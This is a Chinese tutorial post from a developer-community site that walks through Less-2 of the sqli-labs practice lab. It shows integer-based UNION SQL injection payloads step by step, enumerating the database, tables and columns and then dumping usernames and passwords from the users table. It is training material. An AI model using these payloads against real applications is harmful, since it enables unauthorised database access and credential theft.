AI 助理
备案控制台
开发者社区 安全 文章 正文

sqli-lab教程Less-2

2024-01-25 117
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sqli-lab教程Less-2

less-2

sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。


学习sqli注入必备语句:

查库:select schema_name from information_schema.schemata


查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例)


查字段:select column_name from information_schema.columns where table_name=‘users’(此处拿users表例)


查字段的值:select username,password from security.users(此处拿username,password字段为例)


1.加单引号看出,此处是整形注入


2.使用order by语句判断列数,3列回显正确,说明有三列


3.使用union select联合查询,把id改成一个不存在的值使得有回显位

?id=-1 union select 1,2,3



4.进行爆库操作

?id=-1 union select 1,2,database()



5.进行爆表操作

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'


group_concat:将所有的数据连接进行拼接后作为一行显示


where:指定库的位置


6.进行爆字段操作

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'



7.进行爆字段值操作

?id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from security.users


concat_ws(’~’,A,B)


显示为(A~B),用于区分用户名、密码


注入完成! 这是方法之一,后期会出sqlmap工具等教程…
文章标签:
安全
数据安全/隐私保护
Brucye
目录
相关文章
DarrenPig
|
Web App开发 移动开发 Linux
DP读书:《openEuler操作系统》(七)FSCK与VFS虚拟文件系统
DP读书:《openEuler操作系统》(七)FSCK与VFS虚拟文件系统
DarrenPig
467 0
Brucye
|
安全
sqli-lab教程Less-9
sqli-lab教程Less-9
Brucye
166 0
Brucye
|
安全
sqli-lab教程Less-8
sqli-lab教程Less-8
Brucye
230 0
tinyvvampirepudge
|
Android开发
mac下配置adb环境变量
在终端中输入adb命令时,会提示 command not found ,这是是因为mac电脑下没有配置Android环境变量或者环境变量配置错误。
tinyvvampirepudge
2828 0
流淌的琴声
|
5月前
|
敏捷开发 数据可视化 BI
敏捷开发轻量级看板工具:提升效率的秘密武器
敏捷开发是一种以人为核心、迭代递进的软件开发方法,强调灵活应对变化与持续反馈。其核心原则来自《敏捷宣言》,包括重视个体协作、可工作软件、客户合作和响应变化。与传统开发相比,敏捷更注重快速交付和客户参与。看板作为轻量级工具,通过可视化工作流提升协作效率,适合Scrum等敏捷方法。主流工具如板栗看板、KanbanFlow等提供简洁界面和实时协作功能,帮助团队管理任务流程。敏捷团队应结合看板工具进行日常站会、Sprint回顾,持续优化开发流程。轻量级看板工具适用于不同规模团队,是提升敏捷效率的有效选择。
流淌的琴声
477 0
_揽
|
小程序
【小程序】报错:no such file or directory, access ‘wxfile://usr/miniprogramLog/log2‘
【小程序】报错:no such file or directory, access ‘wxfile://usr/miniprogramLog/log2‘
_揽
2407 0
CrissChan
|
测试技术 API 微服务
性能测试并发量评估新思考
性能测试并发量评估新思考
CrissChan
576 20
性能测试并发量评估新思考
py世界
|
数据挖掘 定位技术 API
Python GIS神器geopandas 1.0版本来了
Python GIS神器geopandas 1.0版本来了
py世界
394 4
Echo_Wish
|
机器学习/深度学习 PyTorch TensorFlow
使用Python实现智能食品质量检测的深度学习模型
使用Python实现智能食品质量检测的深度学习模型
Echo_Wish
588 1
vohelon
|
存储 Oracle 关系型数据库
OceanBase有什么优势?
【8月更文挑战第12天】OceanBase有什么优势?
vohelon
775 3

热门文章

最新文章

  • 1
    《自己动手写Docker》书摘之三: Linux UnionFS
  • 2
    全球首个成人搜索引擎Boodigo比谷歌还厉害
  • 3
    【深度】生态红利即将爆发,剖析阿里云市场软件交易与交付新战略
  • 4
    EDAS——如何快速定位OOM问题
  • 5
    TFS分布式文件系统应用
  • 6
    阿里云logo设计入口(在线一键生成)
  • 7
    【AI大模型应用开发】【综合实战】AI+搜索,手把手带你实现属于你的AI搜索引擎(附完整代码)
  • 8
    aswing学习笔记4-通过调用面板中的按钮实现主界面动态切换皮肤的问题!
  • 9
    Active Directory 回收站配置篇
  • 10
    C#学习笔记——接口
  • 1
    基于 YOLOv8 的驾驶员疲劳状态识别系统实战(含完整源码与可视化界面)
    40
  • 2
    基于 YOLOv8 的交通标识与设施识别系统(含完整源码)
    52
  • 3
    阿里云免费云服务器领取教程及阿里云免费云产品全解析:从资源配置到实用指南
    48
  • 4
    金融量化场景下阿里云服务器 ECS 实例规格族选择指南
    47
  • 5
    阿里云万小智 AI 建站系统全解析:版本功能、价格体系与场景适配
    56
  • 6
    别再当冤大头!知识管理工具避坑指南,选择真·提效神器
    40
  • 7
    阿里云 CDN 计费体系全解析:基础服务、增值服务与选型指南
    51
  • 8
    向量搜索升级指南:FAISS 到 Qdrant 迁移方案与代码实现
    28
  • 9
    租用阿里云服务器一年要多少钱?今年新手必看最新阿里云服务器价格表
    37
  • 10
    阿里云 DNS 云解析全解析:免费版与付费版差异对比及选型指南
    40

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    基于Python+Vue开发的口腔牙科预约管理系统